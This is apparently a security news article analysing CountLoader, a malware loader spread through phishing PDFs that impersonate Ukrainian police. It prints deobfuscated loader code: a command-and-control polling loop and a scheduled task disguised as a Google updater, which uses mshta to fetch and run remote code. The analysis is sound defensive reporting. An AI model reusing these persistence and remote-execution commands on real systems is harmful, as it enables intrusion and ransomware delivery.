In recent months, security teams have observed the emergence of a sophisticated malware loader, dubbed CountLoader, which leverages weaponized PDF files to deliver ransomware payloads.
First detected in late August 2025, CountLoader is linked to multiple Russian-speaking cybercriminal groups, including affiliates of LockBit, BlackBasta, and Qilin.
By masquerading as legitimate documents—often impersonating Ukrainian law enforcement—this loader takes advantage of social engineering and PDF exploit chains to gain an initial foothold in target environments.
CountLoader’s deployment methodology revolves around three distinct versions written in JScript (.hta), .NET, and PowerShell.
Each variant exhibits unique attributes: the JScript version offers the most comprehensive functionality with multiple download and execution methods, the .NET binary enforces a hardcoded kill switch after a preset date, and the PowerShell script persists as a concise loader with reflective in-memory execution.
Silent Push analysts noted that all variants incorporate a custom C2 communication protocol employing XOR and Base64 encryption routines to conceal their control traffic.
The impact of CountLoader extends far beyond mere initial access. Upon successful execution, the loader fingerprinted device-specific details—such as hardware identifiers, domain membership, and antivirus product presence—to generate a unique victim ID.
It then engages in persistent C2 polling loops, downloading secondary payloads such as Cobalt Strike beacons, Adaptix implants, and pureHVNC backdoors.
Organizations with domain-joined systems in Eastern Europe have been the primary targets, suggesting strategic selection of corporate and governmental entities.
.webp "New Malware Loader 'CountLoader' Weaponized PDF File to Deliver Ransomware 3")
CountLoader was notably delivered via a PDF-based phishing lure impersonating the National Police of Ukraine. The malicious PDF contained an embedded HTML application object that triggered mshta.exe to fetch and execute the JScript loader.
Upon opening the document, victims encountered an official-looking notification instructing them to “start your request” via an embedded link, which initiated the loader download process.
Infection Mechanism
CountLoader’s infection mechanism begins with the weaponized PDF exploiting user interaction rather than zero-day vulnerabilities.
The PDF embeds an HTA object that invokes the Windows mshta engine when clicked.
This HTA script is obfuscated using a free JavaScript obfuscator and contains around 850 lines of code.
.webp "New Malware Loader 'CountLoader' Weaponized PDF File to Deliver Ransomware 4")
After deobfuscation, the main loop responsible for C2 contact is visible:
for (let i = 1; i <= 10; i++) {
let c2Url = `https://ms-team-ping${i}.com/api/getFile?fn=CheckStatus`;
let response = CheckStatusC2ReturnDecryptedResponse(c2Url, victimFingerprint);
if (response === "success") {
connectAndAuthenticate(c2Url.replace("CheckStatus", "connect"), victimFingerprint);
break;
}
}
// Scheduled task creation for persistence
CreateScheduledTask({
name: "GoogleUpdaterTaskSystem",
command: `mshta https://${envVar}.example.com/start`,
delay: "PT10M"
});Upon successful contact, CountLoader leverages HTTP POST requests with custom Bearer tokens obtained from the C2 to fetch tasks.
These tasks include downloading executables via WinHTTP, MSXML2, Curl, Bitsadmin, or Certutil, demonstrating the loader’s adaptability and deep system knowledge.
Once tasks are executed, CountLoader reports completion back to the server, ensuring robust task management.
This infection workflow underscores CountLoader’s design as a highly modular and persistent loader, capable of delivering diverse ransomware and post-exploitation tools while evading detection through obfuscation and encrypted communications.
Find this Story Interesting! Follow us on Google News, LinkedIn, and X to Get More Instant Updates.
Source link
